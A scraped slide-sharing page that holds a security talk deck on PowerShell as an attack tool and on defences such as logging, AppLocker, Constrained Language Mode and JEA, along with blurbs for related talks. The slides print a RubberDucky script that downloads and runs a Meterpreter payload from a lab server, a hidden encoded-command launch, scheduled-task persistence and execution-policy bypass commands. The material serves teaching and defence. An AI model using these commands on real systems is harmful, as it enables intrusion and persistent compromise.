PowerShell is now a ‘mandatory-to-use’ tool for IT professionals in order to automate administration of the Windows OS and applications, including Azure and Nano Server. Unfortunately, threat actors have recently taken advantage of this powerful scripting language just because PowerShell it’s already installed on your Windows machines, trusted by Admins and most AntiVirus tools! The session presents the steps that should get you starting on (Ethical) Hacking and Pen Testing with PowerShell and some new techniques like JEA (Just Enough Administration) that a defender can use in order to limit the effectiveness of PowerShell attacks.
PowerShell, the must have tool for administrators, and the long overlooked security challenge. See Kieran Jacobsen present how PowerShell, with its deep Microsoft platform integration can be utilised by an attack to become a powerful attack tool. Learn how an attacker can move from a compromised workstation to a domain controller using PowerShell and WinRM whilst learning how to defend against these attacks.
Pre-auth SYSTEM RCE on Windows Is more common than you think
----
With minimal to no effort, we can gain SYSTEM level access to hundreds, if not, thousands of machines on the internet [remotely]. No, this is not a new super 1337 exploit and no this is not even a new technique. No super fancy website with poorly designed logo is necessary, there is nothing new here. Tim and Dennis have discovered that something only stupid sysadmins would do turns out to be much more prevalent than expected. What starts off as a sysadmin's innocent attempt to fix an issue, turns into complete compromise of entire servers/workstations with no effort needed from the attacker. Tim and Dennis will discuss how we came to this realization and explain how we automated looking for these issues in order to find hundreds of vulnerable machines over the internet. Tim and Dennis explain the tool developed for automation, provide statistics discovered from our research, and go over ways to protect yourself from falling victim to the issue.
PowerShell, the must have tool for administrators, and the long overlooked security challenge. See Kieran Jacobsen present how PowerShell, with its deep Microsoft platform integration can be utilised by an attack to become a powerful attack tool. Learn how an attacker can move from a compromised workstation to a domain controller using PowerShell and WinRM whilst learning how to defend against these attacks.
Pre-auth SYSTEM RCE on Windows Is more common than you think
----
With minimal to no effort, we can gain SYSTEM level access to hundreds, if not, thousands of machines on the internet [remotely]. No, this is not a new super 1337 exploit and no this is not even a new technique. No super fancy website with poorly designed logo is necessary, there is nothing new here. Tim and Dennis have discovered that something only stupid sysadmins would do turns out to be much more prevalent than expected. What starts off as a sysadmin's innocent attempt to fix an issue, turns into complete compromise of entire servers/workstations with no effort needed from the attacker. Tim and Dennis will discuss how we came to this realization and explain how we automated looking for these issues in order to find hundreds of vulnerable machines over the internet. Tim and Dennis explain the tool developed for automation, provide statistics discovered from our research, and go over ways to protect yourself from falling victim to the issue.
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
After successfully attacking an endpoint and gaining a foothold there, sophisticated attackers know that to get to the valuable data within an organization they must quietly pivot. From reconnaissance to escalation of privileges to stealing credentials, learn about the tactics and tools that attackers are using today.
All You Need is One - A ClickOnce Love Story - Secure360 2015NetSPI
ClickOnce is a deployment solution that enables fast, easy delivery of packaged software. It is commonly used by organizations to deploy both internal and production-grade software packages, along with their respective updates. By allowing end-users to accept the requested permissions of the software package without the intervention of an administrator, ClickOnce simplifies the deployment and use of robust software solutions.
It also provides an excellent opportunity for malicious actors to establish a foothold in your network.
In this presentation, we discuss how we combined ClickOnce technology and existing phishing techniques into a new methodology for establishing an initial presence in an environment. By minimizing user interaction, we only require that the user is fooled for “one click” – after that, we already have a foothold in their environment and are ready to pivot and escalate further.
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
This presentation was given at the SANS Rpcky Mountain Conference in Denver, CO June 2014. The presentation had a rather large portion that was demo. That is not captured here. Sorry.
Lateral Movement: How attackers quietly traverse your NetworkEC-Council
After successfully attacking an endpoint and gaining a foothold there, sophisticated attackers know that to get to the valuable data within an organization they must quietly pivot. From reconnaissance to escalation of privileges to stealing credentials, learn about the tactics and tools that attackers are using today.
All You Need is One - A ClickOnce Love Story - Secure360 2015NetSPI
ClickOnce is a deployment solution that enables fast, easy delivery of packaged software. It is commonly used by organizations to deploy both internal and production-grade software packages, along with their respective updates. By allowing end-users to accept the requested permissions of the software package without the intervention of an administrator, ClickOnce simplifies the deployment and use of robust software solutions.
It also provides an excellent opportunity for malicious actors to establish a foothold in your network.
In this presentation, we discuss how we combined ClickOnce technology and existing phishing techniques into a new methodology for establishing an initial presence in an environment. By minimizing user interaction, we only require that the user is fooled for “one click” – after that, we already have a foothold in their environment and are ready to pivot and escalate further.
SANS @Night Talk: SQL Injection ExploitedMicah Hoffman
This presentation was given at the SANS Rpcky Mountain Conference in Denver, CO June 2014. The presentation had a rather large portion that was demo. That is not captured here. Sorry.
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
This talk serves as a follow up to my Introducing PS>Attack talk and covers some new features that have been added to the tool as well as how to defend an environment against PowerShell based attacks.
Dive into the realm of cybersecurity mastery with our Advanced Penetration Testing course! 🌐💻 Unleash your skills in ethical hacking, vulnerability assessment, and secure system fortification. This advanced training goes beyond the basics, providing hands-on experience in navigating complex security landscapes. Elevate your expertise and become a guardian against evolving cyber threats. Join us in this transformative journey where you'll learn to think like a hacker to better defend against cyber adversaries. 🛡️🚀 Don't just secure systems; become the formidable defender every digital landscape needs. Enroll now and level up your penetration testing prowess!
Click on the links given to contact us📳
🌐 https://certhippo.com/page/courses/comptia
📧 info@certhippo.com
📱 https://wa.me/+13029562015
☎️ +1 302 956 2015
#certhippo #AdvancedPenTesting #EthicalHacking #CybersecurityMastery #SecureYourNetwork #PenTestExpertise #HackerMindset #HandsOnTraining #CyberDefense #InfoSecPro #DigitalGuardian #SecurityLandscape #ElevateYourSkills #DefendAgainstThreats #EnrollNow #ExpertCyberDefender #CyberSecurityTraining #PenTestMastery #TechSkills #TransformativeLearning #CybersecurityGuardian #HackersBeware #LevelUpYourSecurity
Application and Website Security -- Fundamental EditionDaniel Owens
This is the first presentation in the 200 level, specifically targeting developers with a more hardcore training program. This program includes numerous case studies and live demonstrations and is considered technical, but does not require a working knowledge of the languages discussed.
This encompasses different techniques employed by leveraging powershell and attacking the systems in different ways. It is an interesting agglomeration of combined methods in plundering a windows box
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
Top 10 ways to make hackers excited: All about the shortcuts not worth takingPaula Januszkiewicz
Designing secure architecture can always be more expensive, time consuming, and complicated. But does it make sense to cut corners when hackers invent new attacks every day? Taking shortcuts will sooner or later translate to more harm and backfire. Come to the session and learn what mistakes we eliminated when working with our customers.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
CyberOm - Hacking the Wellness Code in a Chaotic Cyber WorldEC-Council
Learn how to find peace and happiness within you and around you amidst chaos and understanding how the mind-body-energy connection plays a crucial role in the world of Cyber. Mental health and wellness can be the difference between a Cyber professional and a criminal.
Cloud Security Architecture - a different approachEC-Council
Whether people admit or not, everyone is moving to the cloud and all future business will run somewhere on the internet. Moving to the cloud requires different set of architecture and mindset. Data is stored, accessed and processed on different platforms and devices. Employees are working anywhere from the world, corporate data is no more under company IT custody. CISOs and CIOs need to think differently and set new Cloud Security Architecture. This session will try to draw the main areas of concern from Security perspective while moving to the cloud.
This webinar is primarily intended for those that are in need of an informational overview on how to respond to information security incidents or have a responsibility for doing so. It will also assist with your preparation for a Computer Security Incident Handling certification.
Hacking Your Career – Hacker Halted 2019 – Keith TurpinEC-Council
HACKING YOUR CAREER
Learn how to take charge of your future and ring success out of every opportunity. I had some hard lessons on my way to becoming the CISO of a billion dollar company and now you can benefit from those experiences. In this candid conversation, you will learn the secrets to kicking your career’s ass.
HACKING DIVERSITY
We talk a lot about why diversity is important and we are all familiar with the woeful inclusion stats. In this talk we will discuss why diversity is important from both the perspective of an organization’s bottom line and the individual contributor.
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverEC-Council
CLOUD PROXY TECHNOLOGY [THE CHANGING LANDSCAPE OF THE NETWORK PROXY]
This class will cover the distinctions between traditional proxy technology and the emergence in recent years of cloud proxy and why it matters to organizations today. We will review real use cases and their corresponding screen shots to provide a stimulating session.
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...EC-Council
DNS: STRATEGIES FOR REDUCING DATA LEAKAGE & PROTECTING ONLINE PRIVACY
DNS is the foundational protocol used to directly nearly all Internet traffic making the collection and analysis of DNS traffic highly valuable. This talk will examine ways in which you can effectively limit the disclosure of your online habits through securing the way your local DNS resolvers work.
Data in cars can be creepy – Hacker Halted 2019 – Andrea AmicoEC-Council
THE $750 BILLION VEHICLE DATA GOLD RUSH – PIRATES AHOY!
Vehicle data may be worth $750b by 2030. Problem: vehicle security, privacy, and user awareness of risks are inadequate. Andrea Amico will share some exploits including his “CarsBlues” which exposes people’s personal data, affects 22 makes, and is still a 0-Day for tens of millions of vehicles.
BREAKING SMART [BANK] STATEMENTS
Explanation of how I find and exploit a security flaw (bad implementation of cryptography) in a bank statement, sent via email, of one of the biggest banks in Mexico.
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanEC-Council
ARE YOUR CLOUD SERVERS UNDER ATTACK
For this presentation, I built out a test lab in AWS and allowed someone to hack the servers. I will talk about what we saw when we opened RDP to the internet, what the hackers did once they got in, and someone trying to kick me off my own servers.
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...EC-Council
Behold the powers of behavioral alchemy! Are you ready to unleash 4 "Trojan Horses for the Mind" that will change the way you communicate forever? How about a magic wand that will help manifest secure behaviors and shape culture? Attend this session and harness the power.
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...EC-Council
Present your risk assessments to your board of directors in the language they understand - financial loss. "FAIR" or "Factor Analysis of Information Risk" is the quantitative risk analysis methodology that works with common frameworks while adding context for truly effective risk management.
Alexa is a snitch! Hacker Halted 2019 - Wes WidnerEC-Council
ALEXA IS A SNITCH!
You’re not paranoid, your voice assistant is listening. And what’s worse, Alexa is stitching on you! What is she hearing? Where is she sending it? And is there anything we can do to stop her?!
Join me as we discuss the current state of security around voice assistants. And how to silence them.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Search and Society: Reimagining Information Access for Radical FuturesBhaskar Mitra
The field of Information retrieval (IR) is currently undergoing a transformative shift, at least partly due to the emerging applications of generative AI to information access. In this talk, we will deliberate on the sociotechnical implications of generative AI for information access. We will argue that there is both a critical necessity and an exciting opportunity for the IR community to re-center our research agendas on societal needs while dismantling the artificial separation between the work on fairness, accountability, transparency, and ethics in IR and the rest of IR research. Instead of adopting a reactionary strategy of trying to mitigate potential social harms from emerging technologies, the community should aim to proactively set the research agenda for the kinds of systems we should build inspired by diverse explicitly stated sociotechnical imaginaries. The sociotechnical imaginaries that underpin the design and development of information access technologies needs to be explicitly articulated, and we need to develop theories of change in context of these diverse perspectives. Our guiding future imaginaries must be informed by other academic fields, such as democratic theory and critical theory, and should be co-developed with social science scholars, legal scholars, civil rights and social justice activists, and artists, among others.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
2. George Dobrea
xEduco
gdobrea@xeduco.net | @gdobrea
Microsoft Certified Trainer (since 1998)
MVP – Enterprise Security (since 2005)
EC-Council Instructor of the Year (2016)
3. My Last trips:
Bucharest (home)
Tokyo
Phnom Penh / Cambodia
Washington DC
New Delhi
Dubai
London
Brussels
Vilnius, Tallinn, Riga
Finland
Peru
Germany
Toronto
Cape Town
Teaching / Consulting / Speaking / Volunteering
Or Just Travelling for Fun…
4. My First Public Speech about PowerShell Vulnerabilities in a
MS conference…
5. > Get-content
PowerShell as an attack platform
PowerShell malware
Pen Testing tools based on PowerShell
PowerShell security, and bypassing that security
Defence strategies
PowerShell v5 new security features
6. PowerShell
Shell and scripting language present by
default on all Windows machines.
… Now open sourced and available on Linux
Designed to automate things and make life
easier for system admin.
Based on .Net framework and is tightly
integrated with Windows.
Access to the Win32 and Native API
Easy to learn and to write scripts !
8. Current Landscape of PowerShell Threats
38 % of security incidents reported utilized PowerShell in some
form or another
68 % of system breaches having some PowerShell involvement.
31 % of all reported incidents involving PowerShell drummed up
no security alerts before the threat was discovered.
Carbon Black - United Threat Research Report 2016
“If PowerShell is a hammer, everything is a nail”
10. … Why Not?
Powershell is an ideal platform for attackers
Installed by DEFAULT on Windows Systems
Provides access to almost everything in a Windows platform which
could be useful for an attacker
o Registry, file system, active directory, networking, services, processes, WMI,
COM, Hyper-V
Run code in memory without touching disk
WinRM is enabled by DEFAULT on Windows Server
Trusted by countermeasures (AntiVirus) and SysAdmins
A wealth of attack / pen testing tools already exist:
o Shellcode injectors, DLL injectors, keyloggers, port-scanners, reverse/bind
shells, botnets, hash dumping utilities
11. PowerShell attack code can be invoked by:
Microsoft Office Macro (VBA)
WMI
HTA Script (HTML Application – control panel extensions)
CHM (compiled HTML help)
Java JAR file
Other script type (VBS/WSH/BAT/CMD)
Typically an Encoded Command
Encoded commands obfuscate attack code and can even be compressed to avoid
the Windows console character limitation (8191)
Powershell.exe –WindowStyle Hidden –noprofile –EncodedCommand <BASE64ENCODED>
12. Great, but how do I execute it on a victim machine ?
Code execution gained from an existing exploit
Via a website command injection vulnerability
Physical access – USB HID device
Stolen / captured credentials. With credentials, remote code execution
can be gained with:
WMI
WSMAN
RDP, PowerShell Web Access ( yes, you can run PS from your smartphone ), etc…
19. Kali Linux – Social Engineering Toolkit (SET)
Kali Linux: More than 600
penetration testing tools included
- Some of them using PowerShell
attack techniques
The SET has become a
standard in the arsenal of
the penetration tester
22. BadUSB RubberDucky Attack ( example #2)
Create a PowerShell Meterpreter reverse TCP payload and place it
somewhere on your Kali Linux Web Server
This bypasses most AV, HIPS, IDS and Firewalls and leaves no evidence on
the system
DELAY 750
GUI r
DELAY 750
STRING cmd
DELAY 200
ENTER
DELAY 200
STRING powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.132/powershell.ps1')
DELAY 200
ENTER
26. Basic methods (easy to implement, also to detect and remove)
Registry Settings
Scheduled tasks
Advanced Persistent Mechanism:
Permanent WMI
What if I want to persist my payloads
PS> schtasks /Create /SC ONIDLE /I 1 `
/TN Updater /TR “powershell.exe `
-Command Write-Host ‘Doing evil stuff…’“
27. Windows PowerShell Remoting and WinRM
PowerShell Remoting is based upon WinRM, Microsoft’s WS-
Management implementation
Supports execution in 3 ways:
Remote enabled commands
Remotely executed script blocks
Remote sessions
Security Model = Trusted Devices + User Credentials
WinRM is required for the Windows Server Manager
WinRM is enabled by DEFAULT on Windows 2012(R2) Server
WinRM is allowed through Windows Firewall on all network profiles!
PowerShell/Win32-OpenSSH - work in progress !
28. PowerShell Remoting Kerberos Double Hop
Solved Securely
$ServerB = Get-ADComputer -Identity ServerB
$ServerC = Get-ADComputer -Identity ServerC
Set-ADComputer -Identity $ServerC -PrincipalsAllowedToDelegateToAccount $ServerB
No PowerShell code modification.
No more SPNs for constrained delegation!
Credentials are not stored on ServerB.
Multiple domains and forests supported across trusts.
https://blogs.technet.microsoft.com/ashleymcglone/2016/08/30/powershell-remoting-kerberos-double-hop-solved-securely/
Resource-Based Kerberos Constrained Delegation is the solution !
29. PowerShell ‘Legacy’ Security Features
Administrative rights
UAC
Code Signing
Local or Remote source using zone.identifier alternate data
stream
PowerShell Execution Policy
30. Bypassing Execution Policy ( Easy !!!)
The PowerShell Execution Policy is not a security boundary
Simply ask PowerShell: powershell.exe –executionpolicy unrestricted
Switch the files zone.idenfier back to local: unblock-file yourscript.ps1
Read the script in and then execute it (may fail depending on script)
Encode the script and use –encodedcommand – always works!!
Get/Steal a certificate, sign script, run script
C:> powershell.exe –executionpolicy bypass –windowstyle hidden
–noninteractive –nologo –file “c:exploit.ps1”
31. Operational Security / Dealing with Forensics
Change WinRM settings / Block WinRM ?
Application whitelisting - AppLocker Policies
Enabling Constrained Language Mode
Log PowerShell Activity
Detecting attacks on mitigations (audit any changes to profile.ps1 or
the registry keys that control module logging)
32. PowerShell is not powershell.exe
powershell.exe is just a host
application
it hosts the assembly that contains
PowerShell and handles I/O
System.Management.Automation.dll
Blocking PowerShell.exe does not
stop PowerShell attacks!
33. PowerShell v5 ♥ the Blue Team !
Over-the-shoulder transcription
Deep script block logging
Antimalware Scan Interface Integration
Cryptographic Message Syntax (CMS) encryption and decryption
cmdlets
Secure code generation APIs
Applocker + Constrained Language Mode
Protected Event Logging
Preventing unrestricted admin access (JEA)
34. PowerShell Logging
PS > Get-EventLog – LogName “Windows PowerShell” - InstanceId 800 |`
Where Message –match Add-Type | Select –First 10 | Format-List
Module Logging
Script Block Logging *
System-wide transcripts *
*Enabled by KB3000850 on Windows Server
2012 R2/ Windows 8.1 or WMF 5.0
Microsoft-Windows-PowerShell/Operational events:
4103 –Module logging
4104/4105/4106 –Script block logging
35. Limiting PowerShell Attack Capability with
Constrained Language Mode
removing advanced feature support such as .Net & Windows API
calls and COM access
The lack of this advanced functionality stops most PowerShell
attack tools
Drawback: an environment variable must be set, either by running
a command in PowerShell or via Group Policy
Pairing PowerShell v5 with AppLocker :
PowerShell v5 detects when Applocker Allow mode is in effect and sets the
PowerShell language to Constrained Mode for interactive input and user-
authored scripts, severely limiting the attack surface on the system
[Environment]::SetEnvironmentVariable(‘__PSLockdownPolicy‘, ‘4’, ‘Machine‘)
36. Just In Time, Just Enough Administration (JitJea)
based on Windows PowerShell constrained runspaces
allowing specific users to perform administrative tasks on servers
without giving them administrator rights
auditing all actions that these users performed
Before JEA
PS C:> Copy-Item C:SecureFilesFile.txt
C:DeploymentFile.txt
PS C:> Get-Content C:DeploymentFile.txt
Information I should not see
Using JEA
PS C:> Copy-Item C:SecureFilesFile.txt
C:DeploymentFile.txt
PS C:> Get-Content C:DeploymentFile.txt
This command is not available
37. PS> Enter-PSSession Server1
FAIL! – Talk to your supervisor for assistance
“George I need to be admin on Server1 to restart SQL”
“No Eddie.
Just use JEA and connect to the ‘Maintenance
EndPoint”
PS> Enter-JeaSession Server1 –Name Maintenance
Server1> Restart-Service MSSQLSERVER
Server1
Server1> Steal-Secrets
Error: You are not authorized to
Steal-Secrets
38. Time to set PowerShell policies in your organization…
Sample here:
Change ExecutionPolicy to only allow signed scripts to run.
Require all PowerShell scripts to be run from a specific location or path.
Discourage (or require exception for) the use of encoded parameters on the
command line.
Discourage (or block) PowerShell scripts from downloading content from the
Internet (or specify a “whitelist” of allowed IP addresses only).
Discourage (or block) the use of PowerShell to invoke commands on remote
systems.
Require a custom parameter to be passed on all “legitimate” PowerShell
usage.
Restrict PowerShell to specific users in your organization.
Require PowerShell to be launched from a specific process.
39. Useful Resources
PowerShell Galery
• https://www.powershellgallery.com/
Hey, Scripting Guy! Blog
• http://blogs.technet.com/b/heyscriptingguy/
Just Enough Administration (JEA)
• https://msdn.microsoft.com/en-us/powershell/jea/using-jea
Practical Persistence with PowerShell
• http://www.exploit-monday.com/2013/04/PersistenceWithPowerShell.html>
PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection
https://adsecurity.org/?p=2921
PowerShell Version 5 Security Enhancements
• https://adsecurity.org/?p=2277
Blogs of PowerShell gurus:
• Jeffrey Snower, Matt Graeber, Adam Driscoll, Sean Metcalf, Will Schroeder